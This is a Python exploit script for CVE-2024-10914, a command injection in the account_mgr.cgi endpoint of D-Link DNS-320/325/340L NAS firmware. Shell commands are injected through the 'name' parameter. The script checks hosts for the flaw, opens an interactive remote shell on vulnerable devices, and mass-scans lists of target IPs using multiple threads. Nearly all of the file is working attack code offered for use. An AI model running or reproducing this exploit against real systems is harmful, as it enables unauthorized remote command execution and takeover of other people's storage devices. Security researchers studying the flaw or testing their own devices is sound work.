#!/usr/bin/env python3

import re
import requests
import argparse
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.panel import Panel
from rich.prompt import Prompt
from rich.progress import Progress, BarColumn, TextColumn

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

console = Console()

payload = ["id", "uname -a", "hostname", "cat /proc/cpuinfo"]
endpoint = "/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'"
headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36'}

def ascii_art():
    console.print(Panel("""
[+] The affected products are as follows
        - DNS-320
            Firmware Version: 1.00
        - DNS-320LW
            Firmware Version: 1.01.0914.2012
        - DNS-325
            Firmware Versions: 1.01, 1.02
        - DNS-340L
            Firmware Version: 1.08
   ______     ________    ___   ____ ___  __ __       _______  ____ _____ __
  / ____/ |  / / ____/   |__ \\ / __ \\__ \\/ // /      /  / __ \\/ __ /  / // /
 / /    | | / / __/________/ // / / /_/ / // /_______/ / / / /_/ / / // /_
/ /___  | |/ / /__/_____/ __// /_/ / __/__  __/_____/ / /_/ /\\__, / /__  __/
\\____/  |___/_____/    /____/\\____/____/ /_/       /_/\\____//____/_/  /_/ 

Coded By: ThemeHackers
For more details or to contribute: https://github.com/ThemeHackers/CVE-2024-10914
""", title="CVE-2024-10914 Exploit Tool", subtitle="D-Link RCE PoC", subtitle_align="right"))

def check_vulnerability(target, port):
    """Check if the target is vulnerable"""
    for command in payload:
        url = f"http://{target}:{port}{endpoint.format(command)}"
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            response.raise_for_status()
            if re.search(r"uid=\d+\(\w+\).*gid=\d+\(\w+\)", response.text):
                console.print(f"[green][+][/green] The target {target} appears to be vulnerable!")
                return True
        except requests.RequestException:
            pass
    return False

def exploit(target, port):
    """Exploit the vulnerability to gain an interactive shell"""
    confirmation = Prompt.ask("[yellow][!][/yellow] Are you sure you want to exploit the target?", choices=["yes", "no"], default="no")

    if confirmation != 'yes':
        console.print("[yellow][*] Aborting exploit.[/yellow]")
        return

    session = PromptSession(HTML("<ansicyan>~$</ansicyan>"), history=InMemoryHistory())
    console.print("[green][*] Interactive session shell started. Type 'exit' to quit.[/green]\n")

    while True:
        try:
            command = session.prompt().strip()
            if command.lower() in ["exit", "quit"]:
                console.print("[yellow][*] Exiting interactive session[/yellow]")
                break

            url = f"http://{target}:{port}{endpoint.format(command)}"
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            if response.status_code == 200:
                output = re.sub(r"Content-type:.*\n?", "", response.text).strip()
                console.print(output, style="cyan")
            else:
                console.print(f"[red][!][/red] Command failed with status code: {response.status_code}")
        except KeyboardInterrupt:
            console.print("\n[yellow][*] Exiting interactive session[/yellow]")
            break
        except requests.RequestException as e:
            console.print(f"[red][!][/red] Error: {e}")

def scan_file(file_path, threads, port):
    """Scan multiple targets from a file"""
    with open(file_path, 'r') as file:
        targets = [line.strip() for line in file if line.strip()]

    with Progress(TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
        task = progress.add_task("[cyan]Scanning Targets...", total=len(targets))

        with ThreadPoolExecutor(max_workers=threads) as executor:
            futures = {executor.submit(check_vulnerability, target, port): target for target in targets}
            for future in as_completed(futures):
                progress.update(task, advance=1)
                target = futures[future]
                try:
                    if future.result():
                        console.print(f"[green][+][/green] Target {target} is vulnerable!")
                except Exception:
                    pass

if __name__ == "__main__":
    ascii_art()

    parser = argparse.ArgumentParser(description="PoC exploit for CVE-2024-10914 - D-Link RCE")
    parser.add_argument("-u", "--url", help="Single target IP to test (e.g., 192.168.1.1)")
    parser.add_argument("-f", "--file", help="File containing list of target IPs to scan")
    parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads for scanning (default: 5)")
    parser.add_argument("-p", "--port", type=int, default=80, help="Port to target (default: 80)")

    args = parser.parse_args()

    if args.url:
        console.print("[red][*] Checking if the target is vulnerable[/red]")
        if check_vulnerability(args.url, args.port):
            console.print("[cyan][*] Starting interactive session shell[/cyan]")
            exploit(args.url, args.port)
        else:
            console.print("[red][-] Target is not vulnerable[/red]")
    elif args.file:
        console.print(f"[cyan][*] Scanning targets from file: {args.file}[/cyan]")
        scan_file(args.file, args.threads, args.port)
    else:
        console.print("[red][-] Please provide either a URL with -u or a file with -f[/red]")

    console.print("\n[blue]For more details or contributions, visit: [link=https://github.com/ThemeHackers/CVE-2024-10914]GitHub Repository[/link][/blue]")
